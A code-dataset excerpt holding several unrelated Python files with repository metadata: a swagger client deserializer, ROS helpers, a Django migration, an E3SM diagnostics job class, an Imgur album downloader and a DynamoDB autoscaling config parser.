:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "wb") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datatime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __hasattr(self, object, name):
return name in object.__class__.__dict__
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if (not klass.swagger_types and
not self.__hasattr(klass, 'get_real_child_model')):
return data
kwargs = {}
if klass.swagger_types is not None:
for attr, attr_type in six.iteritems(klass.swagger_types):
if (data is not None and
klass.attribute_map[attr] in data and
isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and
klass.swagger_types is not None and
isinstance(data, dict)):
for key, value in data.items():
if key not in klass.swagger_types:
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance
| 39.034429
| 96
| 0.551778
|
45089325f885e62408b7fc60eb7ef3b2d75bc4fe
| 2,175
|
py
|
Python
|
generated_python_code/ball_collector/teleoperated/scripts/auxiliary_functions.py
|
mfigat/public_rshpn_tool
|
3555cb8f1eb35ef12441b9aef63dae8f578c2aa7
|
[
"BSD-3-Clause"
] | null | null | null |
generated_python_code/ball_collector/teleoperated/scripts/auxiliary_functions.py
|
mfigat/public_rshpn_tool
|
3555cb8f1eb35ef12441b9aef63dae8f578c2aa7
|
[
"BSD-3-Clause"
] | null | null | null |
generated_python_code/ball_collector/teleoperated/scripts/auxiliary_functions.py
|
mfigat/public_rshpn_tool
|
3555cb8f1eb35ef12441b9aef63dae8f578c2aa7
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
'''
Copyright (c) 2019, Robot Control and Pattern Recognition Group, Warsaw University of Technology
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Warsaw University of Technology nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL <COPYright HOLDER> BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Author: Maksym Figat
'''
import rospy
import sys
DEFAULT_ROS_FREQUENCY=1
CHANNEL_SIZE=1
TOPIC_TIMEOUT=0.5
class AuxiliaryFunctions:
def __init__(self, frequency):
self._loop_rate=rospy.Rate(frequency)
def isSubsystemOK(self):
return not rospy.is_shutdown()
def shutdownSubsystem(self):
print "Shutting down! - TEST"
rospy.signal_shutdown("Shutting down the node")
def sleep(self):
self._loop_rate.sleep()
def getLoopRate(self,frequency):
return rospy.Rate(frequency)
| 41.826923
| 98
| 0.75954
|
1965bc554a47a5d8fc4eeb55d054a5e552ebd16b
| 49
|
py
|
Python
|
iaso/gpkg/__init__.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | 29
|
2020-12-26T07:22:19.000Z
|
2022-03-07T13:40:09.000Z
|
iaso/gpkg/__init__.py
|
BLSQ/iaso-copy
|
85fb17f408c15e8c2d730416d1312f58f8db39b7
|
[
"MIT"
] | 150
|
2020-11-09T15:03:27.000Z
|
2022-03-07T15:36:07.000Z
|
iaso/gpkg/__init__.py
|
BLSQ/iaso
|
95c8087c0182bdd576598eb8cd39c440e58e15d7
|
[
"MIT"
] | 4
|
2020-11-09T10:38:13.000Z
|
2021-10-04T09:42:47.000Z
|
from .export_gpkg import org_units_to_gpkg_bytes
| 24.5
| 48
| 0.897959
|
281a53a8b49319de2ce7f3991f3be1aa468a3445
| 1,200
|
py
|
Python
|
ledger/payments/bpay/migrations/0008_auto_20170203_1045.py
|
jawaidm/ledger
|
7094f3320d6a409a2a0080e70fa7c2b9dba4a715
|
[
"Apache-2.0"
] | 5
|
2018-02-12T03:16:36.000Z
|
2019-09-07T20:36:37.000Z
|
ledger/payments/bpay/migrations/0008_auto_20170203_1045.py
|
jawaidm/ledger
|
7094f3320d6a409a2a0080e70fa7c2b9dba4a715
|
[
"Apache-2.0"
] | 162
|
2018-02-16T05:13:03.000Z
|
2021-05-14T02:47:37.000Z
|
ledger/payments/bpay/migrations/0008_auto_20170203_1045.py
|
jawaidm/ledger
|
7094f3320d6a409a2a0080e70fa7c2b9dba4a715
|
[
"Apache-2.0"
] | 14
|
2018-02-15T05:22:36.000Z
|
2022-02-15T08:24:43.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-03 02:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bpay', '0007_auto_20170106_1600'),
]
operations = [
migrations.AddField(
model_name='bpaytransaction',
name='biller_code',
field=models.CharField(default=135111, max_length=10),
preserve_default=False,
),
migrations.AlterField(
model_name='bpaytransaction',
name='car',
field=models.CharField(blank=True, help_text=b'Customer Additional Reference.', max_length=20, null=True),
),
migrations.AlterField(
model_name='bpaytransaction',
name='country',
field=models.CharField(blank=True, help_text=b'Country of payment.', max_length=3, null=True),
),
migrations.AlterField(
model_name='bpaytransaction',
name='discretionary_data',
field=models.CharField(blank=True, help_text=b'Reason for refund or reversal.', max_length=50, null=True),
),
]
| 32.432432
| 118
| 0.616667
|
206a4a80dc9cbb57df5c5281e4360ff61ccc404d
| 12,501
|
py
|
Python
|
processflow/jobs/e3smdiags.py
|
E3SM-Project/acme_processflow
|
84110cab08f7897d1489a6dc925258580a5d2bff
|
[
"MIT"
] | 3
|
2019-02-06T23:46:36.000Z
|
2022-02-28T01:39:26.000Z
|
processflow/jobs/e3smdiags.py
|
E3SM-Project/acme_processflow
|
84110cab08f7897d1489a6dc925258580a5d2bff
|
[
"MIT"
] | 62
|
2018-04-30T16:26:48.000Z
|
2021-06-02T18:25:35.000Z
|
processflow/jobs/e3smdiags.py
|
E3SM-Project/acme_processflow
|
84110cab08f7897d1489a6dc925258580a5d2bff
|
[
"MIT"
] | 4
|
2018-07-26T16:07:07.000Z
|
2021-06-02T12:01:48.000Z
|
"""
A wrapper class around E3SM Diags
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import os
from bs4 import BeautifulSoup
from processflow.jobs.diag import Diag
from processflow.lib.jobstatus import JobStatus
from processflow.lib.util import render, print_line
class E3SMDiags(Diag):
def __init__(self, *args, **kwargs):
super(E3SMDiags, self).__init__(*args, **kwargs)
self._job_type = 'e3sm_diags'
self._requires = []
self._data_required = []
config = kwargs['config']
custom_args = config['diags']['e3sm_diags'].get(
'custom_args')
if custom_args:
self.set_custom_args(custom_args)
if 'area_mean_time_series' in config['diags']['e3sm_diags']['sets_to_run']:
self._requires.append('timeseries')
self._data_required.append('ts_regrid_atm')
else:
# if config['diags']['e3sm_diags']['sets_to_run'] != ['area_mean_time_series']:
self._requires.append('climo')
self._data_required.append('climo_regrid')
if config['global']['host']:
self._host_path = os.path.join(
kwargs['config']['img_hosting']['host_directory'],
self.short_name,
'e3sm_diags',
'{start:04d}_{end:04d}_vs_{comp}'.format(
start=self.start_year,
end=self.end_year,
comp=self._short_comp_name))
else:
self._host_path = ''
# setup the output directory, creating it if it doesnt already exist
custom_output_path = config['diags'][self.job_type].get(
'custom_output_path')
if custom_output_path:
self._replace_dict['COMPARISON'] = self._short_comp_name
self._output_path = self.setup_output_directory(custom_output_path)
else:
self._output_path = os.path.join(
config['global']['project_path'],
'output',
'diags',
self.short_name,
self.job_type,
'{start:04d}_{end:04d}_vs_{comp}'.format(
start=self.start_year,
end=self.end_year,
comp=self._short_comp_name))
if not os.path.exists(self._output_path):
os.makedirs(self._output_path)
self.setup_job_args(config)
self.setup_job_params(config)
# -----------------------------------------------
def _dep_filter(self, job):
"""
find the climo/ts job we're waiting for, assuming there's only
one climo/ts job in this case with the same start and end years
"""
if job.job_type not in self._requires:
return False
if job.start_year != self.start_year:
return False
if job.end_year != self.end_year:
return False
if job.job_type == 'timeseries':
if job.run_type != 'atm': # we dont care about lnd/ocn/sea-ice ts jobs
return False
return True
# -----------------------------------------------
def setup_dependencies(self, jobs, *args, **kwargs):
"""
Adds climo jobs from this or the comparison case to the list of dependent jobs
Parameters
----------
jobs (list): a list of the rest of the run managers jobs
optional: comparison_jobs (list): if this job is being compared to
another case, the climos for that other case have to be done already too
"""
if self.comparison != 'obs':
# TODO: get model-vs-model to work for ts
other_jobs = kwargs['comparison_jobs']
try:
self_climo, = [job for job in jobs if self._dep_filter(job)]
except ValueError:
msg = 'Unable to find climo for {}, is this case set to generate climos?'.format(
self.msg_prefix())
raise Exception(msg)
try:
comparison_climo, = [job for job in other_jobs if self._dep_filter(job)]
except ValueError:
msg = 'Unable to find climo for {}, is that case set to generates climos?'.format(
self.comparison)
raise Exception(msg)
self.depends_on.extend((self_climo.id, comparison_climo.id))
else:
for job in jobs:
if self._dep_filter(job):
self.depends_on.append(job.id)
if not self.depends_on:
raise ValueError('Unable to find job dependencies for {}'.format(str(self)))
# -----------------------------------------------
def execute(self, config, *args, slurm_args=None, dryrun=False, **kwargs):
"""
Generates and submits a run script for e3sm_diags
Parameters
----------
config (dict): the global processflow config object
dryrun (bool): a flag to denote that all the data should be set,
and the scripts generated, but not actually submitted
"""
self._dryrun = dryrun
variables = dict()
if dryrun:
input_path = os.path.join(config['global']['project_path'], 'dummpy_input_path')
else:
input_path, _ = os.path.split(self._input_file_paths[0])
variables['short_test_name'] = self.short_name
variables['test_data_path'] = input_path
variables['test_name'] = self.case
variables['results_dir'] = self._output_path
variables['num_workers'] = config['diags']['e3sm_diags'].get('num_workers', 24)
variables['machine_path_prefix'] = config['diags']['e3sm_diags']['machine_path_prefix']
if isinstance(config['diags']['e3sm_diags']['sets_to_run'], list):
variables['sets_to_run'] = "' , '".join(config['diags']['e3sm_diags']['sets_to_run'])
else:
variables['sets_to_run'] = config['diags']['e3sm_diags']['sets_to_run']
if self.comparison == 'obs':
if 'area_mean_time_series' in config['diags']['e3sm_diags']['sets_to_run']:
template_input_path = os.path.join(
config['global']['resource_path'],
'e3sm_diags_template_ts_vs_obs.py')
variables['ts_start'] = self.start_year
variables['ts_end'] = self.end_year
variables['ts_test_data_path'] = [x for x in kwargs['depends_jobs'] if x.job_type == 'timeseries'].pop().output_path
else:
template_input_path = os.path.join(
config['global']['resource_path'],
'e3sm_diags_template_vs_obs.py')
else:
template_input_path = os.path.join(
config['global']['resource_path'],
'e3sm_diags_template_vs_model.py')
input_path, _ = os.path.split(self._input_file_paths[0])
variables['reference_data_path'] = input_path
variables['ref_name'] = self.comparison
variables['reference_name'] = config['simulations'][self.comparison]['short_name']
# render the parameter file from the template
param_template_out = os.path.join(
config['global']['run_scripts_path'],
'e3sm_diags_{start:04d}_{end:04d}_{case}_vs_{comp}_params.py'.format(
start=self.start_year,
end=self.end_year,
case=self.short_name,
comp=self._short_comp_name))
# remove previous run script if it exists
if os.path.exists(param_template_out):
os.remove(param_template_out)
render(
variables=variables,
input_path=template_input_path,
output_path=param_template_out)
cmd = ['python', param_template_out]
return self._submit_cmd_to_manager(config, cmd)
# -----------------------------------------------
def postvalidate(self, config, *args, **kwargs):
"""
Check that all the links created by the diagnostic are correct
Parameters
----------
config (dict): the global config object
Returns
-------
True if all links are found
False otherwise
"""
return self._check_links(config)
# -----------------------------------------------
def handle_completion(self, filemanager, config, *args, **kwargs):
"""
Perform setup for webhosting
Parameters
----------
config (dict): the global config object
"""
if self.status != JobStatus.COMPLETED:
msg = f'{self.msg_prefix()}: Job failed, not running completion handler'
print_line(msg)
return
else:
msg = f'{self.msg_prefix()}: Job complete'
print_line(msg)
# if hosting is turned off, simply return
if not config['global'].get('host'):
msg = f'{self.msg_prefix()}: Job completion handler done\n'
print_line(msg)
return
msg = f'{self.msg_prefix()}: Setting up webhosting for diagnostic output'
print_line(msg)
self.setup_hosting(
always_copy=config['global'].get('always_copy', False),
img_source=self._output_path,
host_path=self._host_path)
self._host_url = 'https://{server}/{prefix}/{case}/e3sm_diags/{start:04d}_{end:04d}_vs_{comp}/viewer/index.html'.format(
server=config['img_hosting']['img_host_server'],
prefix=config['img_hosting']['url_prefix'],
case=self.short_name,
start=self.start_year,
end=self.end_year,
comp=self._short_comp_name)
msg = f'{self.msg_prefix()}: Webhosting setup complete, diagnostic available at {self._host_url}'
print_line(msg)
msg = f'{self.msg_prefix()}: Job completion handler done\n'
print_line(msg)
# -----------------------------------------------
def _check_links(self, config):
viewer_path = os.path.join(self._output_path, 'viewer', 'index.html')
if not os.path.exists(viewer_path):
if self._has_been_executed:
msg = f'{self.msg_prefix()}: could not find page index at {viewer_path}'
logging.error(msg)
return False
viewer_head = os.path.join(self._output_path, 'viewer')
if not os.path.exists(viewer_head):
msg = '{}: could not find output viewer at {}'.format(
self.msg_prefix(), viewer_head)
logging.error(msg)
return False
missing_links = list()
with open(viewer_path, 'r') as viewer_pointer:
viewer_page = BeautifulSoup(viewer_pointer, 'lxml')
viewer_links = viewer_page.findAll('a')
for link in viewer_links:
link_path = os.path.join(viewer_head, link.attrs['href'])
if not os.path.exists(link_path):
missing_links.append(link_path)
continue
if link_path[-4:] == 'html':
link_tail, _ = os.path.split(link_path)
with open(link_path, 'r') as link_pointer:
link_page = BeautifulSoup(link_pointer, 'lxml')
link_links = link_page.findAll('a')
for sublink in link_links:
try:
sublink_preview = sublink.attrs['data-preview']
except:
continue
else:
sublink_path = os.path.join(
link_tail, sublink_preview)
if not os.path.exists(sublink_path):
missing_links.append(sublink_path)
if missing_links:
msg = f'{self.msg_prefix()}: missing the following links'
logging.error(msg)
logging.error(missing_links)
return False
else:
msg = f'{self.msg_prefix()}: all links found'
logging.info(msg)
return True
# -----------------------------------------------
| 41.257426
| 132
| 0.548036
|
68ff7d8a8cc7132ff605d31a28f1480ed9df87c7
| 6,230
|
py
|
Python
|
imguralbum.py
|
z-shell/imgur-album-downloader
|
107583bd8e75233bce252cb34674fd46f4aa130f
|
[
"MIT"
] | null | null | null |
imguralbum.py
|
z-shell/imgur-album-downloader
|
107583bd8e75233bce252cb34674fd46f4aa130f
|
[
"MIT"
] | null | null | null |
imguralbum.py
|
z-shell/imgur-album-downloader
|
107583bd8e75233bce252cb34674fd46f4aa130f
|
[
"MIT"
] | 1
|
2022-01-07T01:42:43.000Z
|
2022-01-07T01:42:43.000Z
|
#!/usr/bin/env python3
# encoding: utf-8
"""
imguralbum.py - Download a whole imgur album in one go.
Provides both a class and a command line utility in a single script
to download Imgur albums.
MIT License
Copyright Alex Gisby <alex@solution10.com>
"""
import sys
import re
import urllib.request, urllib.parse, urllib.error
import os
import math
help_message = """
Quickly and easily download an album from Imgur.
Format:
$ python imguralbum.py [album URL] [destination folder]
Example:
$ python imguralbum.py http://imgur.com/a/uOOju#6 /Users/alex/images
If you omit the dest folder name, the utility will create one with the same name
as the album
(for example for http://imgur.com/a/uOOju it'll create uOOju/ in the cwd)
"""
class ImgurAlbumException(Exception):
def __init__(self, msg=False):
self.msg = msg
class ImgurAlbumDownloader:
def __init__(self, album_url):
"""
Constructor. Pass in the album_url that you want to download.
"""
self.album_url = album_url
# Callback members:
self.image_callbacks = []
self.complete_callbacks = []
# Check the URL is actually imgur:
match = re.match("(https?)\:\/\/(www\.)?(?:m\.)?imgur\.com/(a|gallery)/([a-zA-Z0-9]+)(#[0-9]+)?", album_url)
if not match:
raise ImgurAlbumException("URL must be a valid Imgur Album")
self.protocol = match.group(1)
self.album_key = match.group(4)
# Read the no-script version of the page for all the images:
fullListURL = "http://imgur.com/a/" + self.album_key + "/layout/blog"
try:
self.response = urllib.request.urlopen(url=fullListURL)
response_code = self.response.getcode()
except Exception as e:
self.response = False
response_code = e.code
if not self.response or self.response.getcode() != 200:
raise ImgurAlbumException("Error reading Imgur: Error Code %d" % response_code)
# Read in the images now so we can get stats and stuff:
html = self.response.read().decode('utf-8')
self.imageIDs = re.findall('<div id="([a-zA-Z0-9]+)" class="post-image-container', html)
def num_images(self):
"""
Returns the number of images that are present in this album.
"""
return len(self.imageIDs)
def album_key(self):
"""
Returns the key of this album. Helpful if you plan on generating your own
folder names.
"""
return self.album_key
def on_image_download(self, callback):
"""
Allows you to bind a function that will be called just before an image is
about to be downloaded. You'll be given the 1-indexed position of the image, it's URL
and it's destination file in the callback like so:
my_awesome_callback(1, "http://i.imgur.com/fGWX0.jpg", "~/Downloads/1-fGWX0.jpg")
"""
self.image_callbacks.append(callback)
def on_complete(self, callback):
"""
Allows you to bind onto the end of the process, displaying any lovely messages
to your users, or carrying on with the rest of the program. Whichever.
"""
self.complete_callbacks.append(callback)
def save_images(self, foldername=False):
"""
Saves the images from the album into a folder given by foldername.
If no foldername is given, it'll use the cwd and the album key.
And if the folder doesn't exist, it'll try and create it.
"""
# Try and create the album folder:
if foldername:
albumFolder = foldername
else:
albumFolder = self.album_key
if not os.path.exists(albumFolder):
os.makedirs(albumFolder)
# And finally loop through and save the images:
for (counter, image) in enumerate(self.imageIDs, start=1):
image_url = "http://i.imgur.com/"+image+".jpg"
prefix = "%0*d-" % (
int(math.ceil(math.log(len(self.imageIDs) + 1, 10))),
counter
)
path = os.path.join(albumFolder, prefix + image + ".jpg")
# Run the callbacks:
for fn in self.image_callbacks:
fn(counter, image_url, path)
# Actually download the thing
n=''
if os.path.isfile(path):
n=input(r'File Already Exists, Do you want to download again?(Y/N):')
if(n=='Y'):
os.remove(path)
urllib.request.urlretrieve(image_url, path)
if(n=='N'):
print ("Skipping, already exists.")
else:
try:
urllib.request.urlretrieve(image_url, path)
except:
print ("Download failed.")
# Run the complete callbacks:
for fn in self.complete_callbacks:
fn()
if __name__ == '__main__':
args = sys.argv
if len(args) == 1:
# Print out the help message and exit:
print (help_message)
exit()
try:
# Fire up the class:
downloader = ImgurAlbumDownloader(args[1])
print(("Found {0} images in album".format(downloader.num_images())))
# Called when an image is about to download:
def print_image_progress(index, url, dest):
print(("Downloading Image %d" % index))
print((" %s >> %s" % (url, dest)))
downloader.on_image_download(print_image_progress)
# Called when the downloads are all done.
def all_done():
print ("")
print ("Done!")
downloader.on_complete(all_done)
# Work out if we have a foldername or not:
if len(args) == 3:
albumFolder = args[2]
else:
albumFolder = False
# Enough talk, let's save!
downloader.save_images(albumFolder)
exit()
except ImgurAlbumException as e:
print(("Error: " + e.msg))
print ("")
print ("How to use")
print ("=============")
print (help_message)
exit(1)
| 30.841584
| 116
| 0.583949
|
57bc188a7b98c6aa83af0eddab173c978f650137
| 1,942
|
py
|
Python
|
aria/modeling/__init__.py
|
enricorusso/incubator-ariatosca
|
3748b1962697712bde29c9de781d867c6c5ffad1
|
[
"Apache-2.0"
] | 1
|
2018-10-13T06:32:10.000Z
|
2018-10-13T06:32:10.000Z
|
aria/modeling/__init__.py
|
enricorusso/incubator-ariatosca
|
3748b1962697712bde29c9de781d867c6c5ffad1
|
[
"Apache-2.0"
] | null | null | null |
aria/modeling/__init__.py
|
enricorusso/incubator-ariatosca
|
3748b1962697712bde29c9de781d867c6c5ffad1
|
[
"Apache-2.0"
] | 1
|
2020-06-16T15:13:06.000Z
|
2020-06-16T15:13:06.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This package provides an API for modeling ARIA's state and serializing it to storage.
"""
from collections import namedtuple
from . import (
mixins,
types,
models,
utils,
service_template as _service_template_bases,
service_instance as _service_instance_bases,
service_changes as _service_changes_bases,
service_common as _service_common_bases,
orchestration as _orchestration_bases
)
_ModelBasesCls = namedtuple('ModelBase', 'service_template,'
'service_instance,'
'service_changes,'
'service_common,'
'orchestration')
model_bases = _ModelBasesCls(service_template=_service_template_bases,
service_instance=_service_instance_bases,
service_changes=_service_changes_bases,
service_common=_service_common_bases,
orchestration=_orchestration_bases)
__all__ = (
'mixins',
'types',
'models',
'model_bases',
'utils'
)
| 35.309091
| 85
| 0.663234
|
1dea72fb259af792577109738a1dbc63324f43b3
| 13,841
|
py
|
Python
|
dynamic_dynamodb/config/config_file_parser.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
dynamic_dynamodb/config/config_file_parser.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
dynamic_dynamodb/config/config_file_parser.py
|
tellybug/dynamic-dynamodb
|
a681194d933cb31507ddde6a225f1a4ddac0509f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
""" Command line configuration parser """
import sys
import os.path
import ConfigParser
from copy import deepcopy
TABLE_CONFIG_OPTIONS = [
{
'key': 'enable_reads_autoscaling',
'option': 'enable-reads-autoscaling',
'required': False,
'type': 'bool'
},
{
'key': 'enable_writes_autoscaling',
'option': 'enable-writes-autoscaling',
'required': False,
'type': 'bool'
},
{
'key': 'disable_reads_up_scaling',
'option': 'disable-reads-up-scaling',
'required': False,
'type': 'bool'
},
{
'key': 'disable_reads_down_scaling',
'option': 'disable-reads-down-scaling',
'required': False,
'type': 'bool'
},
{
'key': 'reads_lower_threshold',
'option': 'reads-lower-threshold',
'required': False,
'type': 'int'
},
{
'key': 'reads_upper_threshold',
'option': 'reads-upper-threshold',
'required': False,
'type': 'int'
},
{
'key': 'throttled_reads_upper_threshold',
'option': 'throttled-reads-upper-threshold',
'required': False,
'type': 'int'
},
{
'key': 'increase_reads_with',
'option': 'increase-reads-with',
'required': False,
'type': 'int'
},
{
'key': 'decrease_reads_with',
'option': 'decrease-reads-with',
'required': False,
'type': 'int'
},
{
'key': 'increase_reads_unit',
'option': 'increase-reads-unit',
'required': True,
'type': 'str'
},
{
'key': 'decrease_reads_unit',
'option': 'decrease-reads-unit',
'required': True,
'type': 'str'
},
{
'key': 'writes_lower_threshold',
'option': 'writes-lower-threshold',
'required': False,
'type': 'int'
},
{
'key': 'writes_upper_threshold',
'option': 'writes-upper-threshold',
'required': False,
'type': 'int'
},
{
'key': 'throttled_writes_upper_threshold',
'option': 'throttled-writes-upper-threshold',
'required': False,
'type': 'int'
},
{
'key': 'increase_writes_with',
'option': 'increase-writes-with',
'required': False,
'type': 'int'
},
{
'key': 'decrease_writes_with',
'option': 'decrease-writes-with',
'required': False,
'type': 'int'
},
{
'key': 'increase_writes_unit',
'option': 'increase-writes-unit',
'required': True,
'type': 'str'
},
{
'key': 'decrease_writes_unit',
'option': 'decrease-writes-unit',
'required': True,
'type': 'str'
},
{
'key': 'min_provisioned_reads',
'option': 'min-provisioned-reads',
'required': False,
'type': 'int'
},
{
'key': 'max_provisioned_reads',
'option': 'max-provisioned-reads',
'required': False,
'type': 'int'
},
{
'key': 'min_provisioned_writes',
'option': 'min-provisioned-writes',
'required': False,
'type': 'int'
},
{
'key': 'max_provisioned_writes',
'option': 'max-provisioned-writes',
'required': False,
'type': 'int'
},
{
'key': 'maintenance_windows',
'option': 'maintenance-windows',
'required': False,
'type': 'str'
},
{
'key': 'allow_scaling_down_reads_on_0_percent',
'option': 'allow-scaling-down-reads-on-0-percent',
'required': False,
'type': 'bool'
},
{
'key': 'allow_scaling_down_writes_on_0_percent',
'option': 'allow-scaling-down-writes-on-0-percent',
'required': False,
'type': 'bool'
},
{
'key': 'always_decrease_rw_together',
'option': 'always-decrease-rw-together',
'required': False,
'type': 'bool'
},
{
'key': 'sns_topic_arn',
'option': 'sns-topic-arn',
'required': False,
'type': 'str'
},
{
'key': 'sns_message_types',
'option': 'sns-message-types',
'required': False,
'type': 'str'
},
{
'key': 'num_read_checks_before_scale_down',
'option': 'num-read-checks-before-scale-down',
'required': False,
'type': 'int'
},
{
'key': 'num_write_checks_before_scale_down',
'option': 'num-write-checks-before-scale-down',
'required': False,
'type': 'int'
},
{
'key': 'num_write_checks_reset_percent',
'option': 'num-write-checks-reset-percent',
'required': False,
'type': 'int'
},
{
'key': 'num_read_checks_reset_percent',
'option': 'num-read-checks-reset-percent',
'required': False,
'type': 'int'
},
{
'key': 'reads-upper-alarm-threshold',
'option': 'reads-upper-alarm-threshold',
'required': False,
'type': 'int'
},
{
'key': 'reads-lower-alarm-threshold',
'option': 'reads-lower-alarm-threshold',
'required': False,
'type': 'int'
},
{
'key': 'writes-upper-alarm-threshold',
'option': 'writes-upper-alarm-threshold',
'required': False,
'type': 'int'
},
{
'key': 'writes-lower-alarm-threshold',
'option': 'writes-lower-alarm-threshold',
'required': False,
'type': 'int'
},
{
'key': 'lookback_window_start',
'option': 'lookback-window-start',
'required': False,
'type': 'int'
}
]
def __parse_options(config_file, section, options):
""" Parse the section options
:type config_file: ConfigParser object
:param config_file: The config file object to use
:type section: str
:param section: Which section to read in the configuration file
:type options: list of dicts
:param options:
A list of options to parse. Example list::
[{
'key': 'aws_access_key_id',
'option': 'aws-access-key-id',
'required': False,
'type': str
}]
:returns: dict
"""
configuration = {}
for option in options:
try:
if option.get('type') == 'str':
configuration[option.get('key')] = \
config_file.get(section, option.get('option'))
elif option.get('type') == 'int':
try:
configuration[option.get('key')] = \
config_file.getint(section, option.get('option'))
except ValueError:
print('Error: Expected an integer value for {0}'.format(
option.get('option')))
sys.exit(1)
elif option.get('type') == 'float':
try:
configuration[option.get('key')] = \
config_file.getfloat(section, option.get('option'))
except ValueError:
print('Error: Expected an float value for {0}'.format(
option.get('option')))
sys.exit(1)
elif option.get('type') == 'bool':
try:
configuration[option.get('key')] = \
config_file.getboolean(section, option.get('option'))
except ValueError:
print('Error: Expected an boolean value for {0}'.format(
option.get('option')))
sys.exit(1)
else:
configuration[option.get('key')] = \
config_file.get(section, option.get('option'))
except ConfigParser.NoOptionError:
if option.get('required'):
print 'Missing [{0}] option "{1}" in configuration'.format(
section, option.get('option'))
sys.exit(1)
return configuration
def parse(config_path):
""" Parse the configuration file
:type config_path: str
:param config_path: Path to the configuration file
"""
config_path = os.path.expanduser(config_path)
# Read the configuration file
config_file = ConfigParser.RawConfigParser()
config_file.optionxform = lambda option: option
config_file.read(config_path)
#
# Handle [global]
#
global_config = {}
if 'global' in config_file.sections():
global_config = __parse_options(
config_file,
'global',
[
{
'key': 'aws_access_key_id',
'option': 'aws-access-key-id',
'required': False,
'type': 'str'
},
{
'key': 'aws_secret_access_key',
'option': 'aws-secret-access-key-id',
'required': False,
'type': 'str'
},
{
'key': 'region',
'option': 'region',
'required': False,
'type': 'str'
},
{
'key': 'check_interval',
'option': 'check-interval',
'required': False,
'type': 'int'
},
{
'key': 'circuit_breaker_url',
'option': 'circuit-breaker-url',
'required': False,
'type': 'str'
},
{
'key': 'circuit_breaker_timeout',
'option': 'circuit-breaker-timeout',
'required': False,
'type': 'float'
},
])
#
# Handle [logging]
#
logging_config = {}
if 'logging' in config_file.sections():
logging_config = __parse_options(
config_file,
'logging',
[
{
'key': 'log_level',
'option': 'log-level',
'required': False,
'type': 'str'
},
{
'key': 'log_file',
'option': 'log-file',
'required': False,
'type': 'str'
},
{
'key': 'log_config_file',
'option': 'log-config-file',
'required': False,
'type': 'str'
}
])
#
# Handle monitoring
#
monitoring_config = {}
if 'monitoring' in config_file.sections():
monitoring_config = __parse_options(
config_file,
'monitoring',
[
{
'key': 'datadog_api_key',
'option': 'datadog-api-key',
'required': False,
'type': 'str'
},
{
